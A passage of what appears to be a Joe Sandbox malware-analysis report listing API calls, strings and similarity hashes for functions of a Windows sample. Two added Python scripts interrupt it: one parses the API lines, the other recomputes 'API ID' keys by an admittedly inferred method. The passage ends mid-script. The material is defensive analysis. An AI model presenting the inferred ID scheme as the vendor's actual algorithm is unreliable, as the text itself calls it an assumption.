• Instruction Fuzzy Hash: 875180716047009FDB10EF26DC55B2AB7E4EF49721F058929FA96DB2A2DB70EC04DB42
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0094B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0094B546
• GetLastError.KERNEL32 ref: 0094B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0094B5BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: f7524fb62513657f84ee22988970a23f36322a45f576bb6af631eadc930dadfc
• Instruction ID: 399cbd54e5de24be2c6ac11899d550c828adff5d92b416d8f1c46705c5e4e177
• Opcode Fuzzy Hash: f7524fb62513657f84ee22988970a23f36322a45f576bb6af631eadc930dadfc
• Instruction Fuzzy Hash: D3318D35A00209AFCB04EB6CD895EBEBBB8FF4A314F14416AF505D7291DB71DA42CB51
APIs
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00939014
• GetDlgCtrlID.USER32 ref: 0093901F
• GetParent.USER32 ref: 0093903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0093903E
• GetDlgCtrlID.USER32(?), ref: 00939047
• GetParent.USER32(?), ref: 00939063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00939066
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: 519a703c491bc9900769dd8f660e3b2467a19aff8988f0bc81742a148a46192a
• Instruction ID: 9796673eb2b831fe74582047fcb075b03a4dc3de9e3a50c61a718d30ebfe7cfb
• Opcode Fuzzy Hash: 519a703c491bc9900769dd8f660e3b2467a19aff8988f0bc81742a148a46192a
• Instruction Fuzzy Hash: 8521D370A04108BBDF04ABA5DC95EFEBB79EF8A310F100119F961972B1DBB55819DE21
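The "APIs" bullet lines in these function entries (the Ping entry above and the ComboBox/ListBox entries with their "Part of subcall function" lines) follow a fixed shape: `Name.MODULE(arg,arg,...), ref: address`, with `?` for arguments the plugin could not resolve. The following is an added example, not part of the Joe Sandbox report or its IDA plugin: a small parser that turns such lines into records so a function's imports can be counted per module or its constant arguments decoded. The sample block is constructed by copying the Ping entry's lines plus one subcall line of the shape used above. The IcmpSendEcho decoding assumes the arguments are listed in the order of the documented Win32 prototype (IcmpHandle, DestinationAddress, RequestData, RequestSize, RequestOptions, ReplyBuffer, ReplySize, Timeout); under that assumption the trailing 00000FA0 is a 4000 ms timeout.

```python
# Added example (not part of the Joe Sandbox report): parse the "APIs" bullet
# lines of the IDA-plugin function listing into structured records.
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional, Union

# Constructed sample: the Ping entry's lines from the report, plus one
# "Part of subcall function" line of the shape used in the ListBox entries.
SAMPLE_BLOCK = """APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00955793
• inet_addr.WSOCK32(?,?,?), ref: 009557D8
• gethostbyname.WSOCK32(?), ref: 009557E4
• IcmpCreateFile.IPHLPAPI ref: 009557F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00955862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00955878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 009558ED
• WSACleanup.WSOCK32 ref: 009558F3
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
Strings
"""

API_LINE = re.compile(
    r"^\s*(?:[•*-]\s*)?"                                   # optional bullet
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"  # Name.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                           # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# hex constant -> int, '?' -> None, anything else (e.g. READY) kept as text
Arg = Union[int, str, None]


@dataclass
class ApiRef:
    func: str
    module: str
    ref: int                      # call-site address in the dump
    args: List[Arg] = field(default_factory=list)
    caller: Optional[int] = None  # set only for "Part of subcall function" lines


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_line(line: str) -> Optional[ApiRef]:
    """Return an ApiRef for one API bullet line, or None for any other line."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw else []
    caller = m.group("caller")
    return ApiRef(m.group("func"), m.group("module"), int(m.group("ref"), 16),
                  args, int(caller, 16) if caller else None)


def parse_api_block(text: str) -> List[ApiRef]:
    """Parse every API line in one entry; headings and other lines are skipped."""
    return [r for r in (parse_api_line(ln) for ln in text.splitlines()) if r]


def modules_used(refs: List[ApiRef]) -> Counter:
    """Direct calls per module; subcall lines are excluded so nested calls are not double counted."""
    return Counter(r.module for r in refs if r.caller is None)


def icmp_echo_params(rec: ApiRef) -> dict:
    """Decode the constant arguments of an IcmpSendEcho call, assuming the listed
    order matches the Win32 prototype (IcmpHandle, DestinationAddress, RequestData,
    RequestSize, RequestOptions, ReplyBuffer, ReplySize, Timeout)."""
    if rec.func != "IcmpSendEcho" or len(rec.args) != 8:
        raise ValueError("not an IcmpSendEcho call with 8 listed arguments")
    return {"request_size": rec.args[3], "reply_size": rec.args[6], "timeout_ms": rec.args[7]}


if __name__ == "__main__":
    refs = parse_api_block(SAMPLE_BLOCK)
    print(dict(modules_used(refs)))
    for r in refs:
        if r.func == "IcmpSendEcho":
            print(hex(r.ref), icmp_echo_params(r))
```

Feed it the text of any "APIs" block from this listing; lines such as "Strings" or "Memory Dump Source" are ignored, so a whole entry can be passed unchanged.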
APIs
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009390FD
• GetDlgCtrlID.USER32 ref: 00939108
• GetParent.USER32 ref: 00939124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00939127
• GetDlgCtrlID.USER32(?), ref: 00939130
• GetParent.USER32(?), ref: 0093914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0093914F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: 27006a23b6c81942b3b53f92c4c0bf39442ab9c6d29feb0c787b36eb5164352a
• Instruction ID: 0c902501cb6d6216536df180271a75331c88f0c49c1a0b66c68b49a7df1f4cba
• Opcode Fuzzy Hash: 27006a23b6c81942b3b53f92c4c0bf39442ab9c6d29feb0c787b36eb5164352a
• Instruction Fuzzy Hash: 6B21D374A04108BBDF00ABA5DC85FFEBB79EF45300F000019F961972A2DBB54815DA21
APIs
• GetParent.USER32 ref: 0093916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00939184
• _wcscmp.LIBCMT ref: 00939196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00939211
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: 716049e53cf0f5bd2e730fc8e8c865721c73cfdcf426822132a142a59adfe81f
• Instruction ID: 96f9fcbb5bfd24c24beeb8d4f6837f2a799817dcfc3359669b3137abe1ca65ee
• Opcode Fuzzy Hash: 716049e53cf0f5bd2e730fc8e8c865721c73cfdcf426822132a142a59adfe81f
• Instruction Fuzzy Hash: 4811253629C707BEFE112768EC0BFA7779CDB55728F200426F920A40E2FEE168516D94
APIs
• VariantInit.OLEAUT32(?), ref: 009588D7
• CoInitialize.OLE32(00000000), ref: 00958904
• CoUninitialize.OLE32 ref: 0095890E
• GetRunningObjectTable.OLE32(00000000,?), ref: 00958A0E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00958B3B
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00972C0C), ref: 00958B6F
• CoGetObject.OLE32(?,00000000,00972C0C,?), ref: 00958B92
• SetErrorMode.KERNEL32(00000000), ref: 00958BA5
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00958C25
• VariantClear.OLEAUT32(?), ref: 00958C35
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: fd55233f45f53b3b65306322d855ac515decc4cd663efae449ddef6bf51c03e3
• Instruction ID: 704fbb7cf28c661a6a4a6b188f6d7a1b935d9026a6d825395946af59978be40b
• Opcode Fuzzy Hash: fd55233f45f53b3b65306322d855ac515decc4cd663efae449ddef6bf51c03e3
• Instruction Fuzzy Hash: 01C124B1208305AFD700DF69C88492BB7E9FF89349F00496DF98A9B251DB71ED09CB52
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00947A6C
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
• Opcode ID: 314a74af896e69851cfd0003c1a3dad7b3c23800f0835db7f1ca3c1c6147ef7b
• Instruction ID: 980224a8f5b9dd1b294d876d2c229d23eebf35e5bd82349f1edcd765ca96b6ab
• Opcode Fuzzy Hash: 314a74af896e69851cfd0003c1a3dad7b3c23800f0835db7f1ca3c1c6147ef7b
• Instruction Fuzzy Hash: 1BB17B7190820E9FDB00DFE4D885FBEB7B9EF49321F204429E541AB291D774A941DBA1
APIs
• GetSysColor.USER32(00000008), ref: 008E2231
• SetTextColor.GDI32(?,000000FF), ref: 008E223B
• SetBkMode.GDI32(?,00000001), ref: 008E2250
• GetStockObject.GDI32(00000005), ref: 008E2258
• GetClientRect.USER32(?), ref: 0091BDBB
• SendMessageW.USER32(?,00001328,00000000,?), ref: 0091BDD2
• GetWindowDC.USER32(?), ref: 0091BDDE
• GetPixel.GDI32(00000000,?,?), ref: 0091BDED
• ReleaseDC.USER32(?,00000000), ref: 0091BDFF
• GetSysColor.USER32(00000005), ref: 0091BE1D
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
• String ID:
• API String ID: 3430376129-0
• Opcode ID: c270ba387ac4292f472fa9c58b6383a558ea40dadc53aaca366854a4e7e24fa8
• Instruction ID: ceb92ef7f2656ba31d0b95160dc77f940e6505aa76b3857d3ddf755f5c75c254
• Opcode Fuzzy Hash: c270ba387ac4292f472fa9c58b6383a558ea40dadc53aaca366854a4e7e24fa8
• Instruction Fuzzy Hash: 3A216D32518248EFDB116F64EC18BE97B66FB05321F114269FA26950F1CBB10991FF11
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008EFAA6
• OleUninitialize.OLE32(?,00000000), ref: 008EFB45
• UnregisterHotKey.USER32(?), ref: 008EFC9C
• DestroyWindow.USER32(?), ref: 009245D6
• FreeLibrary.KERNEL32(?), ref: 0092463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00924668
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 9d6feee3f0d2915b7f43e3ec67aa2e32c47e869b3134c0d37bdc4ee6c193e68e
• Instruction ID: 5b5e78cea3d1d0a5dd51e2beaccbfb58689d70cfed6ca6c0d63ece8cdbddae6f
• Opcode Fuzzy Hash: 9d6feee3f0d2915b7f43e3ec67aa2e32c47e869b3134c0d37bdc4ee6c193e68e
• Instruction Fuzzy Hash: 8DA17D30701226CFCB29EF15D594B69F764FF46714F2042ADE90AAB262DB30AD16CF91
APIs
• EnumChildWindows.USER32(?,0093A439), ref: 0093A377
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: 6fa0c980684a1e0c48266a1fdd9298be0da546c553a5e70b835134173df46d0e
• Instruction ID: f691b510d85bade502bbee632a595fa5b380b4f46a4063e163a084f4615e02ea
• Opcode Fuzzy Hash: 6fa0c980684a1e0c48266a1fdd9298be0da546c553a5e70b835134173df46d0e
• Instruction Fuzzy Hash: 0991B331604605EECF08DFA4C486BEEFBA8FF45300F548119E89AA7191DF316A99CF91
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 008E2EAE
  • Part of subcall function 008E1DB3: GetClientRect.USER32(?,?), ref: 008E1DDC
  • Part of subcall function 008E1DB3: GetWindowRect.USER32(?,?), ref: 008E1E1D
  • Part of subcall function 008E1DB3: ScreenToClient.USER32(?,?), ref: 008E1E45
• GetDC.USER32 ref: 0091CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0091CD45
• SelectObject.GDI32(00000000,00000000), ref: 0091CD53
• SelectObject.GDI32(00000000,00000000), ref: 0091CD68
• ReleaseDC.USER32(?,00000000), ref: 0091CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0091CDFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: d0aeab06a2cc543dbdf3b36ae34e10b86bd45d7b98e35431aceb7cd8bcee804d
• Instruction ID: 43fa2dab25eec96703c8151c6ab9567f21fa275cb493b6ad16c65f2b2430669d
• Opcode Fuzzy Hash: d0aeab06a2cc543dbdf3b36ae34e10b86bd45d7b98e35431aceb7cd8bcee804d
• Instruction Fuzzy Hash: F071E27560020DDFCF218F64D884AEA3BB9FF49324F14467AED559A2A6C7308C80DBA0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00951A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00951A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00951ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00951AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00951AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00951B10
• InternetCloseHandle.WININET(00000000), ref: 00951B57
  • Part of subcall function 00952483: GetLastError.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 00952498
  • Part of subcall function 00952483: SetEvent.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 009524AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
• Opcode ID: df44c18a191566d449a27e4ee4a93727da67be308899c4799bf758d50ea566e5
• Instruction ID: 6c3b0cf8d1962c3353c59e6704c9708b03415bbe7114b08011a3d8be3d7cc27b
• Opcode Fuzzy Hash: df44c18a191566d449a27e4ee4a93727da67be308899c4799bf758d50ea566e5
• Instruction Fuzzy Hash: F6418EB1501218BFEB12CF51DC99FBB7BACEF08355F00412AFD059A151E7B49E489BA4
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0096F910), ref: 00958D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0096F910), ref: 00958D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00958ED6
• SysFreeString.OLEAUT32(?), ref: 00958F00
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: eb9895940294993d1b10c90892ab75ac3e1bc3f8932008d8a8591d44f647c8d0
• Instruction ID: d55933d9b62929489ca75f11133dfb79c73a74e6112ea4a67169144c11b525ac
• Opcode Fuzzy Hash: eb9895940294993d1b10c90892ab75ac3e1bc3f8932008d8a8591d44f647c8d0
• Instruction Fuzzy Hash: 1EF13C71A00209EFDF14DFA5C888EAEB7B9FF49315F108458F905AB291DB71AE49CB50
APIs
• _memset.LIBCMT ref: 0095F6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0095F848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0095F86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095F8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095F8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0095FA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0095FA7C
• CloseHandle.KERNEL32(?), ref: 0095FAAB
• CloseHandle.KERNEL32(?), ref: 0095FB22
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: 904882d972654dc3e57ea0b80dc3eddb836f536314999495a1f973892ae7db82
• Instruction ID: 687e4d78ebc3fbc88f8ee2f1ae4950ed2afe42ce977db49d18d94dac52dabbdc
• Opcode Fuzzy Hash: 904882d972654dc3e57ea0b80dc3eddb836f536314999495a1f973892ae7db82
• Instruction Fuzzy Hash: B8E1E2316043409FC714EF25C8A1B6ABBE5FF89360F14886DF8899B2A2CB70DC45CB52
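The "API ID" under each function's Similarity entry is the key an analyst pivots on to find the same routine in other reports, so it helps to know how it is built from the APIs list above it. The script below is an added example, not Joe Sandbox code: it parses the bulleted "APIs" lines (including "Part of subcall" lines), splits each API name into CamelCase words, drops words of three characters or fewer (Get, Set, Sys, DC, W never appear in the IDs), groups the remaining words by how often they occur, sorts each group and joins the groups with "$". That derivation is inferred from the entries on this page and reproduces every API ID shown here; it is an assumption about the real algorithm and may differ for names outside these cases. The three sample listings are copied from the report above.

```python
"""Recompute Joe Sandbox 'API ID' similarity keys from an 'APIs' listing.

Added example, not Joe Sandbox code. The derivation is inferred from the
entries in this report and is an assumption about the real algorithm.
"""
from __future__ import annotations

import re
from collections import Counter

# One bullet of an "APIs" listing; "Part of subcall function XXXX:" is optional.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
)
# Assumption: words of three characters or fewer (Get, Set, Sys, Ole, DC, W, ...)
# are dropped; none of them appear in the IDs on this page.
MIN_WORD_LEN = 4


def parse_api_lines(listing: str) -> list[tuple[str, str]]:
    """Return (api_name, module) pairs in listing order, subcalls included."""
    calls = []
    for line in listing.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append((m.group("name"), m.group("module")))
    return calls


def tokenize(api_name: str) -> list[str]:
    """Split a CamelCase API name into words; CRT names such as _memset stay whole."""
    if api_name.startswith("_"):
        words = [api_name]
    else:
        words = re.findall(r"[A-Z][a-z]*|[a-z]+", api_name)
    return [w for w in words if len(w) >= MIN_WORD_LEN]


def api_id(listing: str) -> str:
    """Most frequent words first; each frequency group sorted and joined with '$'."""
    counts = Counter(w for name, _ in parse_api_lines(listing) for w in tokenize(name))
    groups: dict[int, list[str]] = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    # sorted() on str uses code point order, which places "_memset" after "Process".
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


# Sample listings copied from the report above (the WinINet, cleanup and CreateProcess routines).
WININET_BLOCK = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00951A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00951A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00951ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00951AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00951AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00951B10
• InternetCloseHandle.WININET(00000000), ref: 00951B57
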